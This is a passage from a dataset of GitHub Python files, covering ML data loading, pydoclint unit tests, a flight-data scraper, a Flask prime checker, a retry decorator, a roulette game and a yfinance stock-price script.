train_dataset:\n print(\"No data\")\n return\n\n for i in range(len(train_dataset)):\n item = train_dataset[i]\n if self.save_memory:\n z = torch.from_numpy(item[4])\n # print(\"Shape of Encoded Depth: \", z.shape)\n else:\n if i % 1000 == 0:\n print(\"Encoding Progress: \", i, \"/\", len(train_dataset))\n depth = item[4]\n depth = torch.from_numpy(depth).unsqueeze(0).unsqueeze(0).to(self.device)\n mu, log_var = self.encoder.encode(depth)\n z = self.encoder.reparameterize(mu, log_var).squeeze(0).to(\"cpu\").detach()\n goal = torch.from_numpy(item[1])\n velocity = torch.from_numpy(item[2])\n neighbor = torch.from_numpy(item[3]).flatten()\n action = torch.from_numpy(item[5])\n\n if neighbor.shape[0] > 0:\n combined = torch.cat([goal, velocity, z, neighbor], dim=0)\n else:\n combined = torch.cat([goal, velocity, z], dim=0)\n state_array.append(combined)\n action_array.append(action)\n\n self.trajectory[\"state\"] = state_array\n self.trajectory[\"action\"] = action_array\n # ディレクトリが存在しない場合は作成\n if not os.path.exists(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache')):\n os.mkdir(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache'))\n with open(file_path, 'wb') as f:\n pickle.dump(self.trajectory, f)\n\n def __len__(self):\n if self.load_neighbors is not None:\n return len(self.trajectory[\"state\"])\n else:\n print(\"Dataset must be loaded\")\n return None\n\n def __getitem__(self, idx):\n if self.load_neighbors is not None:\n return self.trajectory[\"state\"][idx], self.trajectory[\"action\"][idx]\n else:\n print(\"Dataset must be loaded\")\n return None\n\n def sample_neighbor(self, neighbors_num, name=\"train\"):\n if self.load_neighbors == neighbors_num:\n idx = np.random.randint(0, len(self.trajectory[\"state\"]))\n dataset = self.trajectory[\"state\"][idx]\n neighbor = dataset[self.params[\"env\"][\"state_dim\"]+self.encoder.latent_dim:]\n return neighbor\n else:\n print(\"Dataset must be loaded\")\n return None","repo_name":"allegorywrite/polka_dot","sub_path":"ppo_wdail/systems/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8373459294","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 4 16:10:46 2018\n\n@author: clark\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\n\nimage_size=64\ndepth=10\nlearning_rate=0.0001\ntrain_from_scratch=1\ntraining_epochs=50\nimage_path='./images808_64_64_3.npy'\nlabel_path='./labels808_2.npy'\nimages=np.load(image_path)\nlabels=np.load(label_path)\nlen_files=np.shape(labels)[0]\nbatch_size=4\n\n#for epoch in range(training_epochs):\navg_cost = 0.\ntotal_snippets = len_files-depth\ntotal_batch=int(total_snippets/batch_size)\n# Loop over all batches\n# total_pred=np.zeros([0,2])\nfor s in range(12):#range(total_snippets-1):\n batch_x=np.zeros([0,depth,image_size,image_size,3])\n for i in range(4):\n batch_x=np.concatenate((batch_x,np.expand_dims(images[s:s+depth,:,:,:],axis=0)))\n \n# batch_x = images[batch_size,i]\n# batch_y = labels[i*batch_size:(i+1)*batch_size]","repo_name":"zyclarkcheng/shot-boundary-detection-by-fcn","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"22781220257","text":"print(\"Wecome to the tip calculator!\")\r\nbill = float(input(\"What was the total bill? $\"))\r\ntip = int(input(\"How much tip would you like to give? \"))\r\npeople = int(input(\"How many people to split the bill? \"))\r\n\r\nbill_with_tip = tip/100 * bill + bill\r\neach_person = (bill_with_tip / people)\r\nfinal = \"{:.2f}\".format(each_person)\r\n#print(150.00 / 5) * 1.12 = 33.6)\r\n\r\nprint(f\"Each person should pay: {final}\")","repo_name":"afarah45/python","sub_path":"tip_cal.py","file_name":"tip_cal.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72309549814","text":"import numpy as np\nimport torch\nimport cv2\nimport os\nimport shutil\n\nfrom glob import glob\nfrom tqdm import tqdm\nfrom PIL import Image\n\nfrom models.model import Model\n\n\nclass MdefDetector(object):\n def __init__(self, model_name=\"mdef_detr_minus_language\", ckpt_path=\"ckpts/MDef_DETR_minus_language_r101_epoch10.pth\"):\n self.model = Model(model_name, ckpt_path).get_model()\n \n def detect(self, image_path, conf_thresh=0.25, caption=\"all objects\", multi_crop=False, verbose=False):\n assert isinstance(image_path, str)\n # Note: Caption is only rquired for MViTs\n if multi_crop:\n dets = self.model.infer_image_multi_crop(image_path, caption=caption)\n else:\n dets = self.model.infer_image(image_path, caption=caption)\n\n bboxes = np.array(dets[0], dtype=np.int32)\n confs = np.array(dets[1], dtype=np.float32)\n idx = np.where(confs >= conf_thresh)\n new_dets = np.zeros((len(idx[0]), 6), dtype=np.float32)\n new_dets[:, :4] = bboxes[idx]\n new_dets[:, -2] = confs[idx]\n new_dets[:, -1] = -1\n h, w, _ = cv2.imread(image_path).shape\n new_dets[np.where(new_dets[:, 0] < 0), 0] = 0\n new_dets[np.where(new_dets[:, 1] < 0), 1] = 0\n new_dets[np.where(new_dets[:, 2] > w), 2] = w\n new_dets[np.where(new_dets[:, 3] > h), 3] = h\n if verbose:\n print(\"mdef_dets: \", new_dets)\n return new_dets\n\n \nif __name__ == \"__main__\":\n model_name=\"mdef_detr_minus_language\"\n ckpt_path=\"ckpts/MDef_DETR_minus_language_r101_epoch10.pth\"\n detector = MdefDetector(model_name, ckpt_path)\n img_path = \"/home/ubuntu/codes/SimilarVan/data/Girl/0005.jpg\"\n detector.detect(img_path, verbose=True)","repo_name":"armada-ai/SimilarVan","sub_path":"detectors/mdef_detector.py","file_name":"mdef_detector.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73376999092","text":"import ast\nfrom typing import Dict, Tuple\n\nimport pytest\n\nfrom pydoclint.utils.astTypes import FuncOrAsyncFuncDef\nfrom pydoclint.utils.generic import getFunctionId\nfrom pydoclint.utils.return_yield_raise import (\n hasGeneratorAsReturnAnnotation,\n hasRaiseStatements,\n hasReturnAnnotation,\n hasReturnStatements,\n hasYieldStatements,\n)\n\nsrc1 = \"\"\"\ndef func1():\n return 101\n\"\"\"\n\nsrc2 = \"\"\"\ndef func2():\n print(\"No return here\")\n\"\"\"\n\nsrc3 = \"\"\"\nasync def func3():\n def func3_child1():\n print(301)\n def func3_child1_grandchild1():\n print(3011)\n return \"async 301\"\n\"\"\"\n\nsrc4 = \"\"\"\ndef func4():\n def func4_child1():\n return \"nested 401\"\n\n def func4_child2():\n print('402')\n def func4_child2_grandchild1():\n return 4021\n\"\"\"\n\nsrc5 = \"\"\"\ndef func5():\n if 1 > 2:\n return 501\n\n if 2 > 6:\n return 506\n\"\"\"\n\nsrc6 = \"\"\"\ndef func6():\n if 5 > 4:\n while 3 > 2:\n for i in range(10):\n async for j in range(10):\n with open('file1') as f1:\n async with open('file2') as f2:\n return True\n\"\"\"\n\nsrc7 = \"\"\"\nclass MyClass:\n def __init__(self):\n pass\n\n def method1(self):\n print('a1')\n def method1_child1(self):\n pass\n return 2\n\n @classmethod\n def classmethod1(cls):\n pass\n def classmethod1_child1():\n return 'hello'\n\"\"\"\n\n\n@pytest.mark.parametrize(\n 'src, expected',\n [\n (src1, True),\n (src2, False),\n (src3, True),\n (src4, False),\n (src5, True),\n (src6, True),\n ],\n)\ndef testHasReturnStatements(src: str, expected: bool) -> None:\n tree = ast.parse(src)\n assert len(tree.body) == 1 # sanity check\n assert isinstance(tree.body[0], (ast.FunctionDef, ast.AsyncFunctionDef))\n assert hasReturnStatements(tree.body[0]) == expected\n\n\ndef testHasReturnStatements_inClass() -> None:\n tree = ast.parse(src7)\n assert len(tree.body) == 1 # sanity check\n assert isinstance(tree.body[0], ast.ClassDef)\n assert len(tree.body[0].body) == 3\n\n expected_list = [False, True, False]\n for node, expected in zip(tree.body[0].body, expected_list):\n assert hasReturnStatements(node) == expected\n\n\nclass HelperVisitor(ast.NodeVisitor):\n \"\"\"A helper class to check each return statements in nested functions\"\"\"\n\n def __init__(self):\n self.returnStatements: Dict[Tuple[int, int, str], bool] = {}\n self.yieldStatements: Dict[Tuple[int, int, str], bool] = {}\n self.raiseStatements: Dict[Tuple[int, int, str], bool] = {}\n self.returnAnnotations: Dict[Tuple[int, int, str], bool] = {}\n self.generatorAnnotations: Dict[Tuple[int, int, str], bool] = {}\n\n def visit_FunctionDef(self, node: FuncOrAsyncFuncDef):\n functionId: Tuple[int, int, str] = getFunctionId(node)\n self.returnStatements[functionId] = hasReturnStatements(node)\n self.yieldStatements[functionId] = hasYieldStatements(node)\n self.raiseStatements[functionId] = hasRaiseStatements(node)\n self.returnAnnotations[functionId] = hasReturnAnnotation(node)\n self.generatorAnnotations[functionId] = hasGeneratorAsReturnAnnotation(\n node,\n )\n self.generic_visit(node)\n\n def visit_AsyncFunctionDef(self, node: ast.AsyncFunctionDef):\n # Treat async functions similarly to regular ones\n self.visit_FunctionDef(node)\n\n\nsrcNested = \"\"\" # Return annotations and statements are intentionally opposite\ndef func4() -> int:\n def func4_child1():\n return \"nested 401\"\n\n def func4_child2() -> float:\n print('402')\n def func4_child2_grandchild1():\n return 4021\n\n def func4_child3() -> List[str]:\n print(1)\n\n def func4_child4():\n class NestedClass:\n def func4_child4_grandchild1(self):\n return 2\n\n def func4_child4_grandchild2(self) -> Dict[str, Tuple[int, float]]:\n print(1)\n\n return 1\n\"\"\"\n\n\ndef testHasReturnStatements_nestedFunction() -> None:\n tree = ast.parse(srcNested)\n visitor = HelperVisitor()\n visitor.visit(tree)\n result = visitor.returnStatements\n\n expected = {\n (2, 0, 'func4'): False,\n (3, 4, 'func4_child1'): True,\n (6, 4, 'func4_child2'): False,\n (8, 8, 'func4_child2_grandchild1'): True,\n (11, 4, 'func4_child3'): False,\n (14, 4, 'func4_child4'): True,\n (16, 12, 'func4_child4_grandchild1'): True,\n (19, 12, 'func4_child4_grandchild2'): False,\n }\n\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'src, expected',\n [\n ('def func1():\\n return 1', False),\n ('def func1() -> int:\\n print(123)', True),\n ('def func1() -> int | float | None:\\n print(123)', True),\n ],\n)\ndef testHasReturnAnnotation(src: str, expected: bool) -> None:\n tree = ast.parse(src)\n assert len(tree.body) == 1 # sanity check\n assert isinstance(tree.body[0], (ast.FunctionDef, ast.AsyncFunctionDef))\n assert hasReturnAnnotation(tree.body[0]) == expected\n\n\ndef testHasReturnAnnotations_nestedFunction() -> None:\n tree = ast.parse(srcNested)\n visitor = HelperVisitor()\n visitor.visit(tree)\n result = visitor.returnAnnotations\n\n expected = {\n (2, 0, 'func4'): True,\n (3, 4, 'func4_child1'): False,\n (6, 4, 'func4_child2'): True,\n (8, 8, 'func4_child2_grandchild1'): False,\n (11, 4, 'func4_child3'): True,\n (14, 4, 'func4_child4'): False,\n (16, 12, 'func4_child4_grandchild1'): False,\n (19, 12, 'func4_child4_grandchild2'): True,\n }\n\n assert result == expected\n\n\nsrcGenerator = \"\"\"\ndef genFuncExample1() -> Generator[int, None, int]:\n yield 1\n yield 2\n return 3\n\ndef genFuncExample2():\n yield 1\n yield 2\n return 3\n\ndef someFunc1() -> Generator[int, None, int]:\n return 1\n\ndef someFunc2():\n yield from genFuncExample2()\n\ndef someFunc3() -> Generator[int, None, None]:\n def someFunc3_child1():\n yield 2\n\n return 1\n\ndef someFunc4():\n yield from range(10)\n def someFunc4_child1():\n yield 2\n\n yield 3\n\ndef someFunc5(arg1):\n if arg1 > 3:\n yield 1\n\n if arg < -1:\n yield 2\n\"\"\"\n\n\ndef testHasGeneratorAsReturnAnnotation() -> None:\n tree = ast.parse(srcGenerator)\n visitor = HelperVisitor()\n visitor.visit(tree)\n result = visitor.generatorAnnotations\n\n expected = {\n (2, 0, 'genFuncExample1'): True,\n (7, 0, 'genFuncExample2'): False,\n (12, 0, 'someFunc1'): True,\n (15, 0, 'someFunc2'): False,\n (18, 0, 'someFunc3'): True,\n (24, 0, 'someFunc4'): False,\n (19, 4, 'someFunc3_child1'): False,\n (26, 4, 'someFunc4_child1'): False,\n (31, 0, 'someFunc5'): False,\n }\n\n assert result == expected\n\n\ndef testHasYieldStatement() -> None:\n tree = ast.parse(srcGenerator)\n visitor = HelperVisitor()\n visitor.visit(tree)\n result = visitor.yieldStatements\n\n expected = {\n (2, 0, 'genFuncExample1'): True,\n (7, 0, 'genFuncExample2'): True,\n (12, 0, 'someFunc1'): False,\n (15, 0, 'someFunc2'): True,\n (18, 0, 'someFunc3'): False,\n (24, 0, 'someFunc4'): True,\n (19, 4, 'someFunc3_child1'): True,\n (26, 4, 'someFunc4_child1'): True,\n (31, 0, 'someFunc5'): True,\n }\n\n assert result == expected\n\n\nsrcRaises = \"\"\"\ndef func1(arg1) -> None:\n a = 1\n b = 2\n raise ValueError('Hello world')\n\ndef func2():\n raise Exception\n\ndef func3(arg1):\n if arg1 > 2:\n raise TypeError\n\nclass CustomError(Exception):\n pass\n\ndef func4():\n raise CustomError('CustomError')\n\ndef func5():\n def func5_child1():\n raise ValueError\n\n return 1\n\ndef func6(arg1):\n if arg1 is None:\n raise TypeError\n\n return arg1 + 2\n\"\"\"\n\n\ndef testHasRaiseStatements() -> None:\n tree = ast.parse(srcRaises)\n visitor = HelperVisitor()\n visitor.visit(tree)\n result = visitor.raiseStatements\n\n expected = {\n (2, 0, 'func1'): True,\n (7, 0, 'func2'): True,\n (10, 0, 'func3'): True,\n (17, 0, 'func4'): True,\n (20, 0, 'func5'): False,\n (26, 0, 'func6'): True,\n (21, 4, 'func5_child1'): True,\n }\n\n assert result == expected\n","repo_name":"jsh9/pydoclint","sub_path":"tests/utils/test_returns_yields_raise.py","file_name":"test_returns_yields_raise.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"21"} +{"seq_id":"10438214437","text":"## getting data from web then upload it to database mysql\nimport requests\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport csv\nfrom itertools import zip_longest \n\nfrom flask import Flask ,render_template\nimport plotly.graph_objects as go\nfrom flask_mysqldb import MySQL \nimport mysql.connector\nimport streamlit as st\nimport csv \nimport pandas as pd\nimport plotly.express as px\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n\n\nlinks=[]\n\n\n#results_CAI_page=requests.get(\"https://www.flightstats.com/v2/flight-tracker/departures/CAI\")\n\n#src=results_CAI_page.content \n\n#soup=BeautifulSoup(src,\"html.parser\")\n\n\nwith open('fli_data/fli2.csv', 'r') as file:\n reader = csv.reader(file)\n #data = list(reader) \n for row in reader:\n #print(row[2])\n if len(links)==4 : break\n links.append(row[2])\n\nlinks_list=list(filter(None,links))\nprint(len(links_list))\n\n\n\n\n\ndep_sch_list=[]\ndep_act_list=[]\narr_sch_list=[]\narr_act_list=[]\nflight_from_list=[]\nflight_to_list=[]\nflight_from_airport_li=[]\nflight_to_airport_li=[]\ntime_stat_li=[]\nflight_code_li=[]\nflight_date_li=[]\nfrom_dep_li=[]\nflight_status_li=[]\n#to get into each link and get the data\nfor link_each_page in range(1,len(links_list)):\n results_link=requests.get(links_list[link_each_page])\n src=results_link.content \n #print(src)\n soup=BeautifulSoup(src,\"html.parser\")\n sched_depart=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 kbHzdx\"})\n flight=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 efwouT\"})\n flight_airport=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 cHdMkI\"})\n flight_code=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 OvgJa\"})\n flight_date=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 cPBDDe\"})\n flight_status=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 iicbYn\"})\n if flight_status[0].text in ['Arrived']:\n flight_link_fordetails=soup.find_all(\"a\",{\"class\":\"button-link__ButtonLink-sc-wcss74-0 dVTZZ\"})\n details_link=flight_link_fordetails[3].get('href')\n ##inside the link to get the weather wind \n res_detailed_link=requests.get(details_link)\n src1=res_detailed_link.content \n soup1=BeautifulSoup(src1,\"html.parser\")\n weather=soup1.find_all(\"div\",{\"class\":\"sc-frDJqD bMlduJ\"})\n\n\n print(weather)\n from_dep_li.append(\"CAI\")\n flight_date_li.append(flight_date[0].text)\n flight_code_li.append(flight_code[0].text)\n #time_stat=soup.find_all(\"div\",{\"class\":\"text-helper__TextHelper-sc-8bko4a-0 feVjck\"}) \n flight_from_list.append(flight[0].text)\n flight_to_list.append(flight[1].text)\n flight_from_airport_li.append(flight_airport[0].text)\n flight_to_airport_li.append(flight_airport[1].text)\n #time_stat_li.append(time_stat[0].text)\n #print(time_stat[0].text)\n dep_sch_list.append(sched_depart[0].text)\n #print(links_list[link_each_page])\n print(sched_depart[0].text)\n dep_act_list.append(sched_depart[1].text)\n arr_sch_list.append(sched_depart[2].text)\n arr_act_list.append(sched_depart[3].text)\n flight_status_li.append(flight_status[0].text)\n # print(flight_airport[1].text)\nprint(flight_status_li)\nprint(\"#########\")\n\n#print(flight_from_airport_li)\n###############################put lists in database\n\nmydb=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"vegatry1\",\n database=\"flaskapp\"\n)\n\n\n#button-link__ButtonLink-sc-wcss74-0 dVTZZ\n\n\n#mycursor=mydb.cursor(buffered=True) \n#print(from_dep_li)\n\n#for i in range(len(flight_code_li)):\n # print(len(flight_code_li))\n#(flight_code_li[0],flight_date[0],from_dep[0],flight_from_list[0],flight_to_list[0],flight_from_airport_li[0],flight_to_airport_li[0],dep_sch_list[0],dep_act_list[0],arr_sch_list[0],arr_act_list[0])\n# mycursor.execute(\"INSERT INTO fli_data_table(flight_code,flight_date,from_dep,flight_from,flight_to,airport_from,airport_to,dep_sch,dep_act,arr_sch,arr_act) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\",(\tflight_code_li[i]\t,flight_date_li[i]\t,from_dep_li[i]\t,flight_from_list[i],\tflight_to_list[i],\tflight_from_airport_li[i]\t,flight_to_airport_li[i],\tdep_sch_list[i]\t,dep_act_list[i],\tarr_sch_list[i]\t,arr_act_list[i]))\n \n #print(flight_date_li[i])\n#mydb.commit()\n#mycursor.close()\n\n######################get data from database########################\n#mycursor.execute()\n#myres=mycursor.fetchall()\n\n#df=pd.DataFrame(myres,columns=['flight_code','flight_date','from_dep','flight_from','flight_to','airport_from','airport_to','dep_sch','dep_act','arr_sch','arr_act','id'])\n#for row in myres:\n\n#def run_query(query):\n# with mydb.cursor() as cur:\n# cur.execute(query)\n# return cur.fetchall()\n\n#rows = run_query(\"Select * from fli_data_table\")\n#for row in rows:\n #print(row)\n","repo_name":"MennaNazmi/flight_delay1","sub_path":"app6.py","file_name":"app6.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37897360701","text":"# save this as app.py\nfrom flask import Flask, request, render_template\n\n# create an instance of the Flask class\napp = Flask(__name__)\n\n# define a function to check if a number is prime\ndef isPrime(n):\n # assume n is a positive integer\n if n == 1:\n return False\n elif n == 2:\n return True\n else:\n for i in range(2, int(n**0.5) + 1):\n if n % i == 0:\n return False\n return True\n\n# find the nearest prime number to n (not including n)\ndef nearestPrime(n):\n delta = 1\n # loop until a prime is found\n while True:\n if isPrime(n + delta):\n # return n + delta as the nearest prime\n return n + delta\n # check if n - delta is a prime and positive\n elif n - delta > 0 and isPrime(n - delta):\n return n - delta\n # increment the delta by 1\n else:\n delta += 1\n\n# define a route for the home page\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef home():\n # initialize the result and number variables\n result = None\n number = None\n closest = None\n delta = None\n\n # check if the request method is POST\n if request.method == \"POST\":\n # get the number input from the form\n number = request.form.get(\"number\")\n\n # check if the number is valid\n try:\n number = int(number)\n if number < 1:\n raise ValueError\n\n # check if the number is prime and set the result accordingly\n if isPrime(number):\n result = \"prime\"\n else:\n result = \"not prime\"\n # find the nearest prime number\n closest = nearestPrime(number)\n delta = abs(number - closest)\n\n except ValueError:\n # handle invalid input and set the result accordingly\n result = \"invalid\"\n\n # render the index.html template with the result and number variables\n return render_template(\"index.html\", result=result, number=number, closest=closest, delta=delta)\n\n# run the app\n# app.run()\n","repo_name":"gbowerman/prime","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23888330109","text":"import os\nimport json\nimport sys\nimport cv2\nimport numpy as np\n\nfrom tqdm import tqdm\n\nVIDEO_ROOT = '/media/vtouchinc02/database/RawData/deepfake'\nTAG_ROOT = '/media/vtouchinc02/database/RawData/deepfake-faces-retinaface-json-backup-clean-fake-results'\nOUTPUT_ROOT = '/media/vtouchinc02/database/RawData/deepfake-faces-retinaface-json-backup-clean-fake-results-images'\n\ndef get_frames(video_path, frame_idxs):\n capture = cv2.VideoCapture(video_path)\n\n frames = []\n idxs_read = []\n for frame_idx in range(frame_idxs[0], frame_idxs[-1] + 1):\n ret = capture.grab()\n if not ret:\n print(\"Error grabbing frame %d from movie %s\" % (frame_idx, video_path))\n break\n current = len(idxs_read)\n if frame_idx == frame_idxs[current]:\n ret, frame = capture.retrieve()\n if not ret or frame is None:\n print(\"Error retrieving frame %d from movie %s\" % (frame_idx, video_path))\n break\n frames.append(frame)\n idxs_read.append(frame_idx)\n\n return idxs_read, frames\n\n\nif __name__ == '__main__':\n if not os.path.isdir(OUTPUT_ROOT):\n os.mkdir(OUTPUT_ROOT)\n\n for i in range(50):\n folder_name = 'dfdc_train_part_%d' % i\n print(folder_name)\n\n output_folder = os.path.join(OUTPUT_ROOT, folder_name)\n if not os.path.isdir(output_folder):\n os.mkdir(output_folder)\n\n metadata_path = os.path.join(TAG_ROOT, folder_name + '/metadata.json')\n with open(metadata_path) as metadata_fp:\n metadata = json.load(metadata_fp)\n\n for video_name, attributes in tqdm(metadata.items()):\n # print(video_name)\n video_path = os.path.join(VIDEO_ROOT, folder_name + '/' + video_name)\n\n # Select frames\n dict_frame_face = {}\n if attributes['label'] == 'REAL':\n if not ('face' in attributes):\n print('No face in %s' % video_name)\n continue\n dict_frame_face = attributes['face']\n else:\n original_video_name = attributes['original']\n original_attributes = metadata[original_video_name]\n if not ('face' in original_attributes):\n print('No face in %s, %s' % (video_name, original_video_name))\n continue\n dict_frame_face = original_attributes['face']\n\n if len(dict_frame_face) == 0:\n print('Zero face in %s' % video_name)\n\n tagged_frame_indices = []\n for frame_index in dict_frame_face.keys():\n tagged_frame_indices.append(int(frame_index))\n\n frame_indices, frames = get_frames(video_path, tagged_frame_indices)\n\n for frame_index, frame in zip(frame_indices, frames):\n for face_index, detection_result in enumerate(dict_frame_face[str(frame_index)]):\n box = np.array(detection_result['box'])\n box = box.astype(int)\n face = frame[box[1]:box[3], box[0]:box[2]]\n if face.size == 0:\n continue\n path = os.path.join(output_folder, '%s-%d-%d.png' % (video_name[:-4], frame_index, face_index))\n cv2.imwrite(path, face)\n\n output_metadata_path = os.path.join(output_folder, 'metadata.json')\n with open(output_metadata_path, \"w\") as fp:\n json.dump(metadata, fp)\n","repo_name":"poperson1205/VTouchDFDC","sub_path":"store_faces.py","file_name":"store_faces.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22006981766","text":"import random\nimport time\nfrom functools import wraps\nfrom logging import Logger\nfrom logging import getLogger\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Optional\n\nlog = getLogger(__name__)\n\n\ndef decorrelated_jitter(\n max_retry: int = 1,\n cap: float = 60.0,\n base: float = 1.0,\n logger: Optional[Logger] = None,\n log_level: Optional[str] = \"WARNING\",\n) -> Callable[[Callable[..., Any]], Callable[..., Any]]:\n \"\"\"Retry a function up to ``max_retry`` times upon failure.\n\n In the following example, the decorated function is retried up to three times if an\n exception occurs::\n\n >>> @decorrelated_jitter(3)\n >>> def func():\n >>> # operation(s) to be retried after an Exception.\n\n In between retries, there will be a sleep, determined by decorrelated jitter based\n on ``cap`` and ``base`` values, where the first sleep is ``t = base`` with the\n subsequent sleeps given by ``t = min(cap, random_between(base, t * 3))`` (see\n [#ref_decorrelated_jitter]).\n\n Args:\n max_retry: The max number the decorated function is\n retried.\n cap: The maximum sleep time in seconds.\n base: The base sleep time in seconds.\n logger: The logger to which logging messages are sent.\n log_level: Logging level. If :obj:`None`, no retry message gets logged.\n\n Raises:\n The last exception raised by the wrapped function after the final retry.\n\n Returns:\n Wrapped function.\n\n .. [#ref_decorrelated_jitter] https://www.awsarchitectureblog.com/2015/03/backoff.html\n \"\"\"\n log = logger or globals()[\"log\"]\n log_level = log_level.lower() if log_level else None\n\n def _retry(f, *args, **kwargs):\n @wraps(f)\n def _wrapper(*args, **kwargs):\n dt = base\n error = None\n for trial in range(max_retry):\n try:\n rv = f(*args, **kwargs)\n except Exception as exc:\n dt = min(cap, random.uniform(base, dt * 3.0))\n if log_level is not None:\n getattr(log, log_level)(\n \"Retry %d/%d of %s after %.3f sec after %r\",\n trial + 1,\n max_retry,\n f.__name__,\n dt,\n exc,\n )\n time.sleep(dt)\n error = exc\n continue\n else:\n return rv\n else:\n raise error\n\n return _wrapper\n\n return _retry\n","repo_name":"okomestudio/pyaides","sub_path":"src/pyaides/functools/retries.py","file_name":"retries.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10350439825","text":"import random\n\nwheel = set(range(0,37))\nwheel.add('00')\nred = {1,3,5,7,9,12,14,16,18,19,21,23,25,27,30,32,34,36}\nblack = set(range(1,37)) - red\ngreen ={0,'00'}\neven = set(range(2,37,2))\nodd = set(range(1,37)) - even\nsmall = set(range(1,19))\ngreat = set(range(19,37))\npropertys = {'red':red, 'black':black, 'even':even, 'odd':odd, 'small':small, 'great':great, 'green':green}\n\nmoney = int(input('How many $ want to play: '))\nbet = int(input(\"Give your bet: \"))\npred = input('Give mi the next number propertys: ')\n\nwhile bet != 0:\n try:\n propertys[pred]\n num = random.choice(list(wheel))\n flag = False\n print(num)\n\n for k in propertys:\n if num in propertys[k]:\n #print(k)\n if pred == k:\n flag = True\n if flag == True:\n money += bet\n print('Win!\\n')\n\n else:\n money -= bet\n print('Loose!\\n')\n if money <= 0:\n break\n\n bet = int(input(\"Give your bet: \"))\n if bet != 0:\n pred = input('Give mi the next number propertys: ')\n\n except KeyError:\n print('You should select from the real propertys!')\n pred = input('Give mi the next number propertys!\\n')\n bet = int(input(\"Give your bet: \"))\n","repo_name":"davidhimer/Homeworks","sub_path":"LuckyWheel.py","file_name":"LuckyWheel.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16454819162","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 26 18:06:17 2021\n\n@author: m.perez-chuecos\n\"\"\"\n\nimport yfinance as yf\nimport pandas as pd\nimport sqlite3\nfrom sqlalchemy import *\n\nstock_name=\"VIS.MC\"\nstock = yf.Ticker(stock_name)\n\n# get stock infos\n# stock.info\n\n# get historical market data\nhist = stock.history(period=\"5y\")\n\n\nhist2017=hist.loc['2017-01-01':'2017-12-31']\nhist2018=hist.loc['2018-01-01':'2018-12-31']\nhist2019=hist.loc['2019-01-01':'2019-12-31']\nhist2020=hist.loc['2020-01-01':'2020-12-31']\n\ncurrency_to_usd_dict={\n 'USD': 1,\n 'EUR': 0.87,\n 'JPY': 0.0088,\n 'CNY': 0.15,\n 'CAD': 0.77,\n 'HKD': 0.12,\n 'CHF': 1.08,\n }\n\nreport_currency= stock.info['financialCurrency']\nstock_currency= stock.info['currency']\nprice=stock.info['currentPrice']\n\nstock_currency_to_usd_conversion_factor= currency_to_usd_dict[stock_currency]\nreport_currency_to_usd_conversion_factor= currency_to_usd_dict[report_currency]\n\nprice_conversion_factor=stock_currency_to_usd_conversion_factor/report_currency_to_usd_conversion_factor\n\nCompanyPriceDataBase=pd.Series({\n 'Ticker': stock_name,\n 'CurrentPrice': price*price_conversion_factor,\n 'ReportCurrency':report_currency,\n 'StockCurrency':stock_currency,\n\n '2020MeanPrice': (hist2020['Open'].mean())*price_conversion_factor,\n '2020MaxPrice': (hist2020['High'].max())*price_conversion_factor,\n '2020MinPrice': (hist2020['Low'].min())*price_conversion_factor,\n\n '2019MeanPrice': (hist2019['Open'].mean())*price_conversion_factor,\n '2019MaxPrice': (hist2019['High'].max())*price_conversion_factor,\n '2019MinPrice': (hist2019['Low'].min())*price_conversion_factor,\n\n '2018MeanPrice': (hist2018['Open'].mean())*price_conversion_factor,\n '2018MaxPrice': (hist2018['High'].max())*price_conversion_factor,\n '2018MinPrice': (hist2018['Low'].min())*price_conversion_factor,\n\n '2017MeanPrice': (hist2017['Open'].mean())*price_conversion_factor,\n '2017MaxPrice': (hist2017['High'].max())*price_conversion_factor,\n '2017MinPrice': (hist2017['Low'].min())*price_conversion_factor,\n \n 